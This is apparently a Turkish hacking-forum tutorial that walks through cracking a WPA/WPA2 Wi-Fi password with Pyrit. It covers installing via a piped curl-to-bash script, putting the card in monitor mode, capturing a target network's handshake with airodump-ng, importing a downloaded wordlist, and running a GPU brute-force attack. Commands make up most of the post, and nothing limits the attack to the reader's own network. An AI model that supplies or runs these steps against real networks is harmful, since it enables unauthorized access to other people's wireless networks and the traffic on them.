Pyrit İle WpaWpa2 Şifre Kırma

packer.py

İstihbarat Tim
29 Eki 2018
208
9
Pyrit kurulum

Terminale gidip aşağıdaki komutları sırasıyla yazarak kurulum ve ayarlamaları otomatik bir şekilde yapmış oluyoruz.

Kod:
git clone https://github.com/Grezzo/pyrit-installer-for-kali-rolling.git
sudo ./install-pyrit-kali-rolling-2021-1.sh     
curl https://raw.githubusercontent.com/Grezzo/pyrit-installer-for-kali-rolling/main/install-pyrit-kali-rolling-2021-1.sh | bash


istihbarat-konu-araligi-2.png



Pyrit nedir?


Pyrit WPA ve WPA2-psk şifreleme algoritmalarını bruteforce dediğimiz kaba kuvvet saldırısı ile ağların parolalarını elde etmemizi sağlıyan programdır. Bu programın diğer parola kırma yazılımları arasındaki farkı, normalde CPU (işlemci) kullanılarak yapılan bu saldırının GPU (ekran kartı) kullanılarak daha hızlı ve performanslı yapılmasını sağlamaktadır.


Kurulumu yaptığımıza göre küçük bir saldırı atağı yapabiliriz.


İlk olarak wifi kartımızı monitor moda geçirelim ve hedef wifi ağının bssid ve channel aralığını bulalım.


Kod:
sudo airmon-ng start wlan1


Kod:
 [SIZE=4]sudo airodump-ng wlan1mon[/SIZE]


Önümüze etraftaki wifi ağları gelmeye başladı CTRL-C ile durdurup bssid ve kanal numarasını kopyalıyoruz. Ardından

handshake yakalamak için airodump-ng aracımızda gerekli alanlara kopyaladığımız bölümü yapıştırıyoruz.


245a505fed0192d32bd9336ab3d2b029.png




Kod:
sudo airodump-ng wlan1mon --channel (ilgili kanal) --bssid (ilgili bssid) --write deneme
deneme.cap adlı dosyamız oluşmuş oldu bu dosya içerisinde wifi parolasının olduğuna emin olmak için küçük bir analiz yapalım


Kod:
pyrit -r deneme.cap analyze

0492c12e623b0d750ad87be50963352b.png



good: Handshake esnasında parola şifrelenmiş şekilde yakalandı ve şifre doğrulandı
Workable: İşe yarıyabilcek cevaplar alındı

Bad: Herhangi bir yanıt alınamadı


istihbarat-konu-araligi-2.png



Analizimizi de yaptığımıza göre wordlistimizi oluşturabiliriz. Ben hazır olarak yabancı bir wordlist kullanıcağım ardından da pyrit veri tabanına tanımlayacağım.



Kod:
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
Kod:
[SIZE=4][SIZE=4]pyrit -i 'probable-v2-wpa-top4800.txt' import_passwords [/SIZE][/SIZE]




-i: Dosyayı belirtmek için
import_passwords: İlgili wordlistimizi veri tabanına kaydetmek için.




istihbarat-konu-araligi-2.png



şimdi de saldırımızı yapabiliriz
Kod:
pyrit -r deneme.cap -b 00:00:00:00:00:00 attack_batch




-r: Yakalanan .cap dosyaları belirtmek için
-b: Hedef Bssid belirtmek için
attack_batch: daha önceden oluşturduğumuz parolaların bulunduğu veri tabanını kullanmak için.



istihbarat-konu-araligi-2.png


Aşağıda gördüğünüz gibi saldırımız ekran kartını kullanarak saniyeler içinde parolayı buldu.


b8db3a71e9a1f3af23a0d752f6c8579c.png





 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.